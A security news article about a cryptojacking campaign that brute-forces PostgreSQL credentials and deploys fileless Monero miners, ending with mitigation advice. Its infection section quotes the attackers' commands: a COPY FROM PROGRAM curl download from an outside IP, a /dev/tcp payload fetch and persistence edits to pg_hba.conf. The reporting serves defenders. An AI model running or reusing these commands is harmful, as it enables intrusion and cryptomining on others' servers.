A significant cryptojacking campaign has emerged, targeting inadequately secured PostgreSQL database servers, affecting over 1,500 organizations worldwide. This operation employs advanced fileless execution techniques alongside credential brute-forcing to deploy Monero (XMR)-mining malware, successfully circumventing conventional cloud workload protection (CWPP) tools.
Security experts have traced the campaign back to the threat actor known as JINX-0126, which has honed its strategies since Aqua Security’s initial observations in late 2024. The attackers exploit PostgreSQL instances that are publicly accessible and secured with weak or default credentials—a configuration issue that plagues approximately 30% of cloud-hosted PostgreSQL servers.
Once access is gained, the attackers utilize PostgreSQL’s COPY FROM PROGRAM function to execute shell commands, effectively bypassing standard file-write detection mechanisms. This method facilitates the deployment of a multi-stage payload chain, which includes UPX-packed Golang binaries disguised as legitimate PostgreSQL processes.
Wiz Threat Research analysts have pinpointed three cryptocurrency wallets associated with this campaign, each displaying around 550 active mining workers as per C3Pool telemetry. At the height of the operation, it generated a hashrate of 4.04 GH/s, translating to approximately €10.40 per hour in XMR revenue based on current market valuations.
While the primary motive appears to be financial gain, the attack’s fileless nature and the resulting system reconfigurations create persistent backdoors, potentially paving the way for future ransomware attacks or data exfiltration.
Infection Mechanism and Defense Evasion
The attack initiates with credential spraying against PostgreSQL’s default postgres account and other commonly used usernames. Successful logins trigger an SQL injection designed to fetch the initial payload:
COPY FROM PROGRAM 'kill -9 $(pgrep zsvc) [...] curl -ksS 159.223.123.175:36287/JzICbeMxNQHwfwHLiCOFnumixtqYBv -o pg_core'This script terminates competing cryptominers, such as kinsing and kdevtmpfsi, before retrieving the pg_core binary. Unlike traditional malware, the payload cpu_hu operates entirely in memory through Linux’s memfd subsystem, resulting in minimal disk artifacts:
exec 5/dev/tcp/159.223.123.175/36287 [...] cat) postmasterTo maintain persistence, the malware modifies PostgreSQL’s pg_hba.conf file to block external authentication attempts while allowing local network access:
host all pgg_superadmins all reject
host all all 127.0.0.1/8 trust Simultaneously, it creates cron jobs for minute-by-minute reactivation and deploys a privileged user, psql_sys, via the CREATE ROLE command. Each binary is equipped with unique configuration blobs encrypted with AES-256, ensuring that every victim’s payload has distinct hashes, thus evading signature-based detection.
This campaign highlights critical gaps in cloud security: 90% of environments host PostgreSQL instances, many of which suffer from inadequate access controls. Wiz recommends implementing network-level restrictions, auditing credentials, and establishing runtime monitoring for memfd-based execution—a crucial indicator of compromise flagged in their advisory.
As opportunistic attacks increasingly target databases, organizations must prioritize configuration hygiene and adopt behavioral threat detection strategies to safeguard their systems.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Requests for Free
